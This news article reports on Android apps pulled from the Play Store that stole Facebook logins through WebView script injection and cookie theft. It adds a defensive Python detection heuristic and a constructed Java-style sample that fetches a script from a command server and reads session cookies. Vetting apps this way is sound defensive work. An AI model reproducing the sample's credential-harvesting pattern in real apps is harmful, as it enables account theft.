
Google pulls a few Android apps from Play Store that could steal Facebook passwords

The Google Play Store is generally the safest place to obtain apps for your Android smartphone, but every once in a while, some bad actors find their way in. Recently, Google removed a handful of Android apps from the Play Store that tried to steal Facebook passwords.

Dr. Web recently highlighted a “trojan” that was embedded within some Android apps that had the ability to trick users into giving up their Facebook password. Ten apps were observed using the software, most of which were actually available in the Google Play Store and had racked up a considerable number of downloads. The nine apps combined were downloaded over 6 million times.

The software worked by presenting a Facebook login screen, making users think that the otherwise harmless app they were using required a Facebook account to function. Once a user entered their credentials on that screen, the data was captured and gave the bad actor access to the unwitting user’s account.

Notably, the displayed login form was genuine. These trojans used a special mechanism to trick their victims. After receiving the necessary settings from one of the C&C servers upon launch, they loaded the legitimate Facebook web page https://www.facebook.com/login.php into a WebView. Next, they loaded JavaScript received from the C&C server into the same WebView. This script was what actually hijacked the entered login credentials. The JavaScript then, using the methods exposed through the JavascriptInterface annotation, passed the stolen login and password to the trojan application, which transferred the data to the attackers’ C&C server. After the victim logged into their account, the trojans also stole the cookies from the current authorization session, and those cookies were likewise sent to the cybercriminals.
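The pattern described above (a real login page loaded into a WebView, a script pulled from a remote server and injected into it, a JavascriptInterface bridge back into native code, and a read of the resulting session cookies) is something an app-vetting pipeline can look for in decompiled source. The following is an added example of such a static triage heuristic, written for this article; it is not code from Dr. Web, Google or any of the apps named here. The decompiled-style Java snippets, the indicator names and the weights are constructed for illustration; each API on its own is legitimate, so the heuristic only flags the combination.

```python
import re
from dataclasses import dataclass

# Each indicator: (name, compiled regex, weight). These are ordinary Android
# APIs; none is malicious alone. Their combination is the signal.
INDICATORS = [
    ("javascript_bridge",
     re.compile(r"addJavascriptInterface\s*\(|@JavascriptInterface"), 3),
    ("script_injection",
     re.compile(r'evaluateJavascript\s*\(|loadUrl\s*\(\s*"javascript:'), 3),
    ("third_party_login_url",
     re.compile(r"facebook\.com/login", re.IGNORECASE), 2),
    ("session_cookie_read",
     re.compile(r"CookieManager\.getInstance\(\)\.getCookie\s*\("), 2),
    ("network_fetch",
     re.compile(r"HttpURLConnection|OkHttpClient"), 1),
]


@dataclass(frozen=True)
class Finding:
    indicator: str
    line_no: int
    line: str


@dataclass
class TriageResult:
    score: int
    findings: list
    flagged: bool


def scan(source: str) -> list:
    """Return one Finding per (indicator, matching line) in decompiled source."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for name, pattern, _ in INDICATORS:
            if pattern.search(line):
                findings.append(Finding(name, line_no, line.strip()))
    return findings


def triage(source: str, threshold: int = 8) -> TriageResult:
    """Score a source file; flag it only when the two ingredients that make a
    genuine login page harvestable (a native bridge plus injected script) are
    both present and the weighted score reaches the threshold."""
    findings = scan(source)
    hit = {f.indicator for f in findings}
    score = sum(w for name, _, w in INDICATORS if name in hit)
    required = {"javascript_bridge", "script_injection"}
    flagged = score >= threshold and required <= hit
    return TriageResult(score, findings, flagged)


# Constructed sample: decompiled-style Java modelled on the behaviour in the report.
SUSPICIOUS_SRC = """
WebView web = findViewById(R.id.web);
web.getSettings().setJavaScriptEnabled(true);
web.addJavascriptInterface(new Bridge(), "Android");
web.loadUrl("https://www.facebook.com/login.php");
HttpURLConnection conn = (HttpURLConnection) new URL(c2 + "/config").openConnection();
String script = readAll(conn.getInputStream());
web.evaluateJavascript(script, null);
String cookies = CookieManager.getInstance().getCookie("https://www.facebook.com");
"""

# Constructed sample: an ordinary in-app help page, no bridge, no injected script.
BENIGN_SRC = """
WebView web = findViewById(R.id.help);
web.getSettings().setJavaScriptEnabled(false);
web.loadUrl("https://example.com/help");
HttpURLConnection conn = (HttpURLConnection) new URL(UPDATE_URL).openConnection();
"""

if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SRC), ("benign", BENIGN_SRC)):
        result = triage(src)
        print(f"{label}: score={result.score} flagged={result.flagged}")
        for f in result.findings:
            print(f"  L{f.line_no} {f.indicator}: {f.line}")
```

The threshold and weights are deliberately coarse; the point is that a WebView showing a third-party login URL together with `addJavascriptInterface` and a script evaluated from a network-fetched string is a combination a reviewer should look at by hand, whereas a WebView with JavaScript disabled and no bridge is not.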

The apps in question included photo editing apps, “App Lock,” a fitness app, and horoscope applications. Some of the apps apparently used Google’s Flutter language. “PIP Photo” was the app that managed the most success, pulling 5.8 million downloads. The rest of the apps were listed at “more than 100,000” downloads or fewer.

ArsTechnica found that all nine apps have been removed from the Play Store, with a Google spokesperson confirming that the bad actor’s developer accounts have also been banned. Google has also been taking steps to further secure the Play Store recently by adding security requirements for Google Play developers.



Author: Ben Schoon
Source: 9TO5Google
